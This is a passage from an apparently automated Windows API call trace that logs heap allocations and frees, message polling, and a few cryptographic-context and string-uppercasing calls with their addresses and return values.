RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0079.855] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a46a0) returned 1 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.858] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0079.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0079.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0079.859] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0079.859] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.859] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.860] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0079.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0079.860] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0079.861] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.861] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0079.861] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.862] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0079.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0079.863] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.864] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0079.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.864] PeekMessageW (in: lpMsg=0x144e284, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e284) returned 0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0079.864] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0079.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.864] 